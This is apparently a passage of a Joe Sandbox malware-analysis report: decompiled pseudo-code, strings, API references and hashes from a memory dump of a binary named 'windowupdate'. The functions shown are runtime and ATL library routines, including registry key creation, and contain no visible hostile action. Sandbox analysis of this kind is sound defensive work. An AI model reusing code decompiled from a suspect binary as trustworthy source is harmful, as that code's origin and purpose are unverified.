                      							if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) != 0 &&  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)) != 0 &&  *((intOrPtr*)( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)))) == 0) {
                      								L00D89480(_v8 << 4,  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)), 2);
                      								_t200 = _t200 + 8;
                      							}
                      							_v8 = _v8 + 1;
                      							continue;
                      						}
                      					}
                      					return L00D89480(__eflags, _a4, 2);
                      				} else {
                      					_t8 = _a4 + 0x7c; // 0xeb027500
                      					if( *((intOrPtr*)( *_t8)) != 0) {
                      						goto L11;
                      					}
                      					if( *((intOrPtr*)(_a4 + 0x84)) != 0) {
                      						_t12 = _a4 + 0x84; // 0xdf6074
                      						_t214 =  *((intOrPtr*)( *_t12));
                      						if( *((intOrPtr*)( *_t12)) == 0) {
                      							_t14 = _a4 + 0x84; // 0xdf6074
                      							_t141 = L00D89480(_t214,  *_t14, 2);
                      							_t16 = _a4 + 0x88; // 0xce1de850
                      							E00DA34B0(_t141,  *_t16);
                      							_t199 = _t199 + 0xc;
                      						}
                      					}
                      					if( *((intOrPtr*)(_a4 + 0x80)) != 0) {
                      						_t20 = _a4 + 0x80; // 0xa1006a16
                      						_t216 =  *((intOrPtr*)( *_t20));
                      						if( *((intOrPtr*)( *_t20)) == 0) {
                      							_t22 = _a4 + 0x80; // 0xa1006a16
                      							L00D89480(_t216,  *_t22, 2);
                      							_t24 = _a4 + 0x88; // 0xce1de850
                      							E00DA3D00( *_t24,  *_t24);
                      							_t199 = _t199 + 0xc;
                      						}
                      					}
                      					_t26 = _a4 + 0x7c; // 0xeb027500
                      					L00D89480(_t216,  *_t26, 2);
                      					_t28 = _a4 + 0x88; // 0xce1de850
                      					_t101 = L00D89480(_t216,  *_t28, 2);
                      					_t199 = _t199 + 0x10;
                      					goto L11;
                      				}
                      			}











                      APIs
                      Strings
                      • (ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat, xrefs: 00DA56C8
                      • minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp, xrefs: 00DA56D9
                      • %ls, xrefs: 00DA56CD
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ___free_lconv_mon___free_lconv_num
                      • String ID: %ls$(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat$minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
                      • API String ID: 717313246-164516335
                      • Opcode ID: f0f704818f846fcb395340c1ec19318d18939553625b108d255e3dc4dda8572b
                      • Instruction ID: 3441cd6faf74a9beb369dec1772e737e17abc56d3694753f4109e39f3fcdafef
                      • Opcode Fuzzy Hash: f0f704818f846fcb395340c1ec19318d18939553625b108d255e3dc4dda8572b
                      • Instruction Fuzzy Hash: F6816174A00204EFEB14DF18D495FA97762FB45358F588168F8495F386CB71EE86CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E00D46190(void* __edi, void* __esi, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				signed int* _v8;
                      				char _v48;
                      				signed int _v56;
                      				signed int _v64;
                      				signed int _v72;
                      				signed int _v76;
                      				void _v80;
                      				void* _t96;
                      				void* _t110;
                      				signed int* _t121;
                      				signed int _t132;
                      				signed int _t146;
                      				void* _t159;
                      				void* _t160;
                      				void* _t161;
                      
                      				memset( &_v80, 0xcccccccc, 0x13 << 2);
                      				_t161 = _t160 + 0xc;
                      				_v8 = _a4;
                      				E00D44D70( &_v48, _v8[1], _a8, _a12, _a16, 1);
                      				_v56 = _v8[6];
                      				_v8[6] =  &_v48;
                      				_v64 = 0;
                      				_t157 = _t161;
                      				_v72 = E00DC1520( *((intOrPtr*)( *( *_v8)))(_v8[1], _a8, _a12, _a16,  &_v64, 0), _t161 - _t161);
                      				_t121 = _v8;
                      				_t164 =  *((intOrPtr*)(_t121 + 0x18)) -  &_v48;
                      				if( *((intOrPtr*)(_t121 + 0x18)) !=  &_v48) {
                      					_t110 = L00D84930(_t164, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xf55, 0, L"%ls", L"pThis->m_pCurrentMsg == &msg");
                      					_t161 = _t161 + 0x18;
                      					if(_t110 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t146 = _v56;
                      				_v8[6] = _t146;
                      				if(_v72 == 0) {
                      					__eflags = _a8 - 0x82;
                      					if(__eflags == 0) {
                      						_t132 = _v8[7] | 0x00000001;
                      						__eflags = _t132;
                      						_t146 = _v8;
                      						 *(_t146 + 0x1c) = _t132;
                      					}
                      					L16:
                      					if((_v8[7] & 0x00000001) != 0) {
                      						_t146 = _v8;
                      						if( *((intOrPtr*)(_t146 + 0x18)) == 0) {
                      							_v76 = _v8[1];
                      							_v8[1] = 0;
                      							_v8[7] = _v8[7] & 0xfffffffe;
                      							_t146 =  *_v8;
                      							E00DC1520( *((intOrPtr*)( *((intOrPtr*)(_t146 + 0xc))))(_v76), _t161 - _t161);
                      						}
                      					}
                      					_push(_t146);
                      					_push(_v72);
                      					E00DC14C0(_t159, 0xd46368);
                      					_pop(_t96);
                      					return E00DC1520(_t96, _t159 - _t161 + 0x4c);
                      				}
                      				_v80 = _a8;
                      				if(_v80 > 0x132) {
                      					_v80 = _v80 - 0x133;
                      					if(_v80 > 5) {
                      						L11:
                      						_t146 = _v8[7] & 0x00000001;
                      						__eflags = _t146;
                      						if(__eflags == 0) {
                      							_t146 =  *(_v8 + 4);
                      							E00D3C3E0(_t157, _t146, 0, _v64);
                      							_t161 = _t161 + 0xc;
                      						}
                      						L13:
                      						goto L16;
                      					}
                      					_t146 = _v80;
                      					goto  *((intOrPtr*)(_t146 * 4 +  &M00D46480))[L10]goto ( *((intOrPtr*)(_t146 * 4 +  &M00D46480)));
                      					L10:
                      					_v72 = _v64;
                      					goto L13;
                      				}
                      				if(_v80 == 0x132) {
                      					goto L10;
                      				}
                      				_v80 = _v80 - 0x2e;
                      				if(_v80 > 0xe2) {
                      					goto L11;
                      				}
                      				_t42 = _v80 + 0xd4639c; // 0x62af9000
                      				switch( *((intOrPtr*)(( *_t42 & 0x000000ff) * 4 +  &M00D46394))) {
                      					case 0:
                      						goto L10;
                      					case 1:
                      						goto L11;
                      				}
                      			}



















                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D4634E
                      Strings
                      • %ls, xrefs: 00D46224
                      • pThis->m_pCurrentMsg == &msg, xrefs: 00D4621F
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D46230
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$pThis->m_pCurrentMsg == &msg
                      • API String ID: 930174750-2182017553
                      • Opcode ID: d27a7ba5a033313097b476cc9fef990c29e279f58da78c1d9293e90c28374798
                      • Instruction ID: 78bcc9ceacf965da86c9217f905d88e2d5b110eb15b732986c3bcead4f348491
                      • Opcode Fuzzy Hash: d27a7ba5a033313097b476cc9fef990c29e279f58da78c1d9293e90c28374798
                      • Instruction Fuzzy Hash: F0611475E00108EFCB18DF98D590AADB7B1FB89304F248159E916AB385C770EE42DFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E00D370C0(void* __ecx, char* __edx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, intOrPtr _a12) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				char _v24;
                      				char _v36;
                      				char* _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				void _v56;
                      				intOrPtr _t48;
                      				intOrPtr _t53;
                      				intOrPtr _t54;
                      				void* _t56;
                      				intOrPtr _t58;
                      				void* _t62;
                      				void* _t64;
                      				void* _t65;
                      				void* _t66;
                      				intOrPtr _t70;
                      				intOrPtr _t81;
                      				char* _t82;
                      				void* _t91;
                      				void* _t92;
                      				void* _t93;
                      
                      				_t82 = __edx;
                      				_push(__ecx);
                      				memset( &_v56, 0xcccccccc, 0xd << 2);
                      				_t93 = _t92 + 0xc;
                      				_pop(_t70);
                      				_v8 = _t70;
                      				do {
                      					if(_a8 < 0) {
                      						_v52 = 0;
                      					} else {
                      						_v52 = 1;
                      					}
                      					_v12 = _v52;
                      					_t96 = _v12;
                      					if(_v12 == 0) {
                      						_t66 = L00D84930(_t96, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x70, 0, "%ls", L"__atl_condVal");
                      						_t93 = _t93 + 0x18;
                      						if(_t66 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					if(_v12 != 0) {
                      						goto L9;
                      					}
                      					_t54 = 0;
                      					L31:
                      					_push(_t82);
                      					E00DC14C0(_t91, 0xd37274);
                      					_t56 = _t54;
                      					return E00DC1520(_t56, _t91 - _t93 + 0x34);
                      					L9:
                      					_t82 = 0;
                      					__eflags = 0;
                      				} while (0 != 0);
                      				__eflags =  *_a4 - _v8;
                      				if(__eflags != 0) {
                      					_t65 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x71, 0, "%ls", L"pData->pStringMgr == this");
                      					_t93 = _t93 + 0x18;
                      					__eflags = _t65 - 1;
                      					if(_t65 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t48 = E00D41ED0( &_a8,  &_a8, _a8, 1);
                      				_t93 = _t93 + 0xc;
                      				__eflags = _t48;
                      				if(_t48 >= 0) {
                      					_t82 = _a8;
                      					_v44 = E00D41F10(_t82, 8);
                      					while(1) {
                      						__eflags = _a8 - _v44;
                      						if(_a8 > _v44) {
                      							_v56 = 0;
                      						} else {
                      							_v56 = 1;
                      						}
                      						_v48 = _v56;
                      						__eflags = _v48;
                      						if(__eflags == 0) {
                      							_t64 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlstr.h", 0x7d, 0, "%ls", L"__atl_condVal");
                      							_t93 = _t93 + 0x18;
                      							__eflags = _t64 - 1;
                      							if(_t64 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v48;
                      						if(_v48 == 0) {
                      							break;
                      						}
                      						__eflags = 0;
                      						if(0 != 0) {
                      							continue;
                      						}
                      						_t82 = _v44;
                      						_t53 = E00D31860(_a12,  &_v36, _t82, _a12);
                      						_t93 = _t93 + 0xc;
                      						__eflags = _t53;
                      						if(_t53 < 0) {
                      							L27:
                      							_t54 = 0;
                      							goto L31;
                      						}
                      						_t82 =  &_v24;
                      						_t58 = E00D416D0(_t53, _v36, _t82, 0x10, _v36);
                      						_t93 = _t93 + 0xc;
                      						__eflags = _t58;
                      						if(_t58 >= 0) {
                      							_t82 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 4))));
                      							_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t82 + 8))))(_a4, _v24);
                      							__eflags = _t93 - _t93;
                      							_v16 = E00DC1520(_t62, _t93 - _t93);
                      							__eflags = _v16;
                      							if(_v16 != 0) {
                      								_t81 = _v44 - 1;
                      								__eflags = _t81;
                      								_t82 = _v16;
                      								 *((intOrPtr*)(_t82 + 8)) = _t81;
                      								_t54 = _v16;
                      							} else {
                      								_t54 = 0;
                      							}
                      							goto L31;
                      						}
                      						goto L27;
                      					}
                      					_t54 = 0;
                      				} else {
                      					_t54 = 0;
                      				}
                      			}

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3725B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlstr.h$__atl_condVal$pData->pStringMgr == this
                      • API String ID: 930174750-2123114947
                      • Opcode ID: dcc1cb9dfbf68bd512997067b76b22ec065af39f42c7f3b5e8fcb0c30c8f9edd
                      • Instruction ID: bb80b802bf5d152491c249f0f7531d6d58f5a94d8dbd395741f69f3147876334
                      • Opcode Fuzzy Hash: dcc1cb9dfbf68bd512997067b76b22ec065af39f42c7f3b5e8fcb0c30c8f9edd
                      • Instruction Fuzzy Hash: 6551C2BAE04608BFDB24DBA5DC86FAEB3B4EB48314F149518F905B7281D270DA44CB74
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 62%
                      			E00D42DE0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				void* _t51;
                      				void* _t54;
                      				void* _t55;
                      				intOrPtr _t62;
                      				void* _t67;
                      				void* _t86;
                      				void* _t87;
                      				void* _t88;
                      				void* _t89;
                      
                      				_t87 = __esi;
                      				_t86 = __edi;
                      				_t67 = __ebx;
                      				_v32 = 0xcccccccc;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				do {
                      					if(_a4 == 0) {
                      						_v24 = 0;
                      					} else {
                      						_v24 = 1;
                      					}
                      					_v8 = _v24;
                      					do {
                      						_t92 = _v8;
                      						if(_v8 == 0) {
                      							_t51 = L00D84930(_t92, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x71, 0, "%ls", L"__atl_condVal");
                      							_t89 = _t89 + 0x18;
                      							if(_t51 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					} while (0 != 0);
                      					_t95 = _v8;
                      					if(_v8 == 0) {
                      						E00D32500(_t67, _t86, _t87, _t95, 0x80070057);
                      					}
                      				} while (0 != 0);
                      				do {
                      					if(_a8 < 0) {
                      						_v28 = 0;
                      					} else {
                      						_v28 = 1;
                      					}
                      					_v12 = _v28;
                      					do {
                      						_t98 = _v12;
                      						if(_v12 == 0) {
                      							_t54 = L00D84930(_t98, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x72, 0, "%ls", L"__atl_condVal");
                      							_t89 = _t89 + 0x18;
                      							if(_t54 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					} while (0 != 0);
                      					_t101 = _v12;
                      					if(_v12 == 0) {
                      						E00D32500(_t67, _t86, _t87, _t101, 0x80070057);
                      					}
                      				} while (0 != 0);
                      				do {
                      					if(_a12 == 0) {
                      						_v32 = 0;
                      					} else {
                      						_v32 = 1;
                      					}
                      					_v16 = _v32;
                      					do {
                      						_t104 = _v16;
                      						if(_v16 == 0) {
                      							_t55 = L00D84930(_t104, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x73, 0, "%ls", L"__atl_condVal");
                      							_t89 = _t89 + 0x18;
                      							if(_t55 == 1) {
                      								asm("int3");
                      							}
                      						}
                      					} while (0 != 0);
                      					_t107 = _v16;
                      					if(_v16 == 0) {
                      						E00D32500(_t67, _t86, _t87, _t107, 0x80070057);
                      					}
                      				} while (0 != 0);
                      				if( *_a4 == _a12) {
                      					__eflags = _a8 - _a16;
                      					if(__eflags <= 0) {
                      						_t58 = _a4;
                      						 *_a4 = _a12;
                      					} else {
                      						_t58 = E00D5B960(_a8, 1);
                      						_t89 = _t89 + 8;
                      						 *_a4 = _t58;
                      					}
                      				} else {
                      					if(_a8 <= _a16) {
                      						_t58 = E00D84B40( *_a4);
                      						_t89 = _t89 + 4;
                      						 *_a4 = _a12;
                      					} else {
                      						_t62 = E00D82210( *_a4, _a8, 1);
                      						_t89 = _t89 + 0xc;
                      						_v20 = _t62;
                      						_t111 = _v20;
                      						if(_v20 == 0) {
                      							E00D32500(_t67, _t86, _t87, _t111, 0x8007000e);
                      						}
                      						_t58 = _a4;
                      						 *_a4 = _v20;
                      					}
                      				}
                      				_t112 =  *_a4;
                      				if( *_a4 == 0) {
                      					_t58 = E00D32500(_t67, _t86, _t87, _t112, 0x8007000e);
                      				}
                      				return E00DC1520(_t58, _t88 - _t89 + 0x1c);
                      			}

                      APIs
                      • __wdupenv_s.LIBCMTD ref: 00D42F35
                        • Part of subcall function 00D32500: _Smanip.LIBCPMTD ref: 00D3253B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Smanip__wdupenv_s
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$__atl_condVal
                      • API String ID: 167151435-2826139414
                      • Opcode ID: 54b2655e1b96ff36b9ac912b8152bd28b72629b612b34742835ca223468c2d9e
                      • Instruction ID: c4ef84e91e4d4c21e98ed8f1aeb3881626346d2d3fb3039764abc439aa20a786
                      • Opcode Fuzzy Hash: 54b2655e1b96ff36b9ac912b8152bd28b72629b612b34742835ca223468c2d9e
                      • Instruction Fuzzy Hash: B7515C70E00209EFDF10EF91C846BBE7770AF54314FA48569F904AB281E3B49A94CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 87%
                      			E00D34490(char** __ecx, void* __esi, void* _a4, char* _a8, char* _a12, int _a16, int _a20, struct _SECURITY_ATTRIBUTES* _a24, intOrPtr* _a28) {
                      				char** _v8;
                      				char** _v12;
                      				int _v16;
                      				char** _v20;
                      				char** _v24;
                      				void* _v28;
                      				char** _v32;
                      				char** _v36;
                      				char** _v40;
                      				long _t53;
                      				void* _t57;
                      				void* _t67;
                      				char* _t83;
                      				void* _t90;
                      				void* _t91;
                      
                      				_t89 = __esi;
                      				_v40 = 0xcccccccc;
                      				_v36 = 0xcccccccc;
                      				_v32 = 0xcccccccc;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t93 = _a4;
                      				if(_a4 == 0) {
                      					_t67 = L00D84930(_t93, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x16e2, 0, "%ls", L"hKeyParent != 0");
                      					_t91 = _t91 + 0x18;
                      					if(_t67 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_v28 = 0;
                      				if(_v8[2] == 0) {
                      					_t89 = _t91;
                      					_t83 = _a8;
                      					_t53 = RegCreateKeyExA(_a4, _t83, 0, _a12, _a16, _a20, _a24,  &_v28,  &_v16);
                      					__eflags = _t91 - _t91;
                      					_v40 = E00DC1520(_t53, _t91 - _t91);
                      				} else {
                      					_t83 = _a8;
                      					_v40 = E00D33200(_v8[2], _t89, _a4, _t83, 0, _a12, _a16, _a20, _a24,  &_v28,  &_v16);
                      				}
                      				_v36 = _v40;
                      				if(_v36 == 0) {
                      					if(_a28 != 0) {
                      						 *_a28 = _v16;
                      					}
                      					_v36 = E00D34420(_v8, _t89);
                      					_t83 = _v28;
                      					 *_v8 = _t83;
                      					_v8[1] = _a20 & 0x00000300;
                      				}
                      				_push(_t83);
                      				_push(_v36);
                      				E00DC14C0(_t90, 0xd345bc);
                      				_pop(_t57);
                      				return E00DC1520(_t57, _t90 - _t91 + 0x24);
                      			}

                      APIs
                      • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,?,?,00000000,?,00000000,?), ref: 00D3454C
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D345A4
                      Strings
                      • hKeyParent != 0, xrefs: 00D344C0
                      • %ls, xrefs: 00D344C5
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D344D1
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckCreateStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hKeyParent != 0
                      • API String ID: 2215485779-2309544881
                      • Opcode ID: f1e5d31f2ab060463fd807e88a0ea7fe5867a6d71671ac0bf9817362acad56bf
                      • Instruction ID: 99816b691d397325efc933cc53c170f97ec49abf6de045930e1a799a15c67104
                      • Opcode Fuzzy Hash: f1e5d31f2ab060463fd807e88a0ea7fe5867a6d71671ac0bf9817362acad56bf
                      • Instruction Fuzzy Hash: 7D41D7B5E00209AFCB04DF98C891BEEB7F9EB4C300F148169E509A7240E775AE41CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E00DC1C50(void* __ebx, void* __edx, void* __edi, void* __esi) {
                      				signed int _v8;
                      				char _v528;
                      				char _v1048;
                      				signed int _t13;
                      				void* _t17;
                      				void* _t27;
                      				void* _t30;
                      				void* _t42;
                      				signed int _t43;
                      				void* _t44;
                      				void* _t45;
                      
                      				_t42 = __esi;
                      				_t41 = __edi;
                      				_t40 = __edx;
                      				_t34 = __ebx;
                      				_t13 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t13 ^ _t43;
                      				if( *0xf237c8 != 0) {
                      					L13:
                      					_t15 = 0;
                      					goto L14;
                      				} else {
                      					 *0xf237c8 = 1;
                      					if(E00DC1DA0(__edx) != 0) {
                      						L14:
                      						return E00D47280(_t15, _t34, _v8 ^ _t43, _t40, _t41, _t42);
                      					} else {
                      						_t17 = E00DC24D0(L"VCRUNTIME140D.dll");
                      						_t45 = _t44 + 4;
                      						if(_t17 == 0) {
                      							L8:
                      							if(E00DC24E0(L"MSPDB140", 0, 0xa00) != 0) {
                      								goto L14;
                      							} else {
                      								if(GetLastError() != 0x57 || E00DC24B0(0,  &_v1048, 0x104) == 0 || E00DC2000(_t34, _t41,  &_v1048,  &_v528, 0x104) == 0) {
                      									goto L13;
                      								} else {
                      									return E00D47280(E00DC24E0( &_v528, 0, 8), _t34, _v8 ^ _t43, _t40, _t41, _t42);
                      								}
                      							}
                      						} else {
                      							_t27 = E00DC24B0(_t17,  &_v1048, 0x104);
                      							_t45 = _t45 + 0xc;
                      							if(_t27 == 0) {
                      								goto L8;
                      							} else {
                      								_t30 = E00DC2000(__ebx, __edi,  &_v1048,  &_v528, 0x104);
                      								_t45 = _t45 + 0xc;
                      								if(_t30 == 0) {
                      									goto L8;
                      								} else {
                      									_t15 = E00DC24E0( &_v528, 0, 0x900);
                      									_t45 = _t45 + 0xc;
                      									if(_t15 != 0) {
                      										goto L14;
                      									} else {
                      										if(GetLastError() != 0x57) {
                      											goto L8;
                      										} else {
                      											_t15 = E00DC24E0( &_v528, 0, 8);
                      											_t45 = _t45 + 0xc;
                      											if(_t15 != 0) {
                      												goto L14;
                      											} else {
                      												goto L8;
                      											}
                      										}
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      			}

                      APIs
                      • GetPdbDllFromInstallPath.LIBCMTD ref: 00DC1C77
                        • Part of subcall function 00DC1DA0: GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00DC1DE9
                        • Part of subcall function 00DC1DA0: GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00DC1E0F
                        • Part of subcall function 00DC1DA0: GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 00DC1E21
                        • Part of subcall function 00DC1DA0: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 00DC1E33
                        • Part of subcall function 00DC1DA0: FreeLibrary.KERNEL32(00000000), ref: 00DC1E67
                        • Part of subcall function 00DC24D0: GetModuleHandleW.KERNEL32(00DC1C8E,?,00DC1C8E,VCRUNTIME140D.dll), ref: 00DC24D7
                      • GetLastError.KERNEL32 ref: 00DC1CEB
                      • GetLastError.KERNEL32 ref: 00DC1D25
